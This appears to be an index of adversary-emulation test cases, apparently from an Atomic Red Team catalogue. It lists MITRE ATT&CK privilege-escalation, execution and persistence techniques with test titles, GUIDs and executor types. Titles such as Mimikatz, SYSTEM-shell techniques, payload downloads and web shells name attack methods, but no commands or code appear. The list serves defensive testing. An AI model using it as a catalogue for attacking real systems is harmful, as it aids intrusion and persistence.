577 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
578 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
579 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
580 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
581 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
582 privilege-escalation T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
583 privilege-escalation T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
584 privilege-escalation T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
585 privilege-escalation T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
586 privilege-escalation T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
587 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
588 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
589 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
590 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
591 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
592 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
593 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
594 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
595 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
596 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
597 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
598 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
599 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
600 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
601 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
602 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
603 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
604 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
605 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
606 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
607 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
608 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
609 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
610 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
611 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
612 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
613 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
614 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
615 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
616 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
617 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
618 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
619 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
620 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
621 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
622 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
623 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
624 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
625 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
626 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
627 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
628 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
629 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
630 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
631 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
632 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
633 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
634 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
635 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
636 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
637 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
638 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
639 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
640 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
641 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
642 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
643 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
644 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
645 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
646 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
647 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
648 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
649 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
650 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
651 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
652 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
653 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
654 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
655 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
656 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
657 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
658 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
659 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
660 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
661 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
662 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
663 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
664 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
665 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
666 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
667 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
668 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
669 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
670 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
671 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
672 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
673 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
674 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
675 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
676 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
677 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
678 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
679 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
680 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
681 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
682 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
683 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
684 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
685 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
686 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
687 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
688 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
689 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
690 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
691 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
692 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
693 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
694 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
695 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
696 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
697 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
698 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
699 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
700 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
701 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
702 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
703 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
704 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
705 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 bash
706 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
707 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
708 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
709 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
710 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
711 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
712 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
713 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
714 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
715 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
716 execution T1569.002 System Services: Service Execution 3 psexec.py (Impacket) edbcd8c9-3639-4844-afad-455c91e95a35 bash
717 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
718 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
719 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
720 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
721 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
722 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
723 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
724 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
725 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
726 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
727 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
728 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
729 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
730 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
731 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
732 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
733 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
734 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
735 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
736 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
737 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
738 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
739 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
740 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
741 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
742 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
743 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
744 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
745 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
746 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
747 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
748 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
749 persistence T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
750 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (Xll) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
751 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
752 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
753 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
754 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
755 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
756 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
757 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
758 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
759 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
760 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
761 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
762 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
763 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
764 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
765 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
766 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
767 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
768 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
769 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
770 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
771 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
772 persistence T1546.005 Event Triggered Execution: Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
773 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
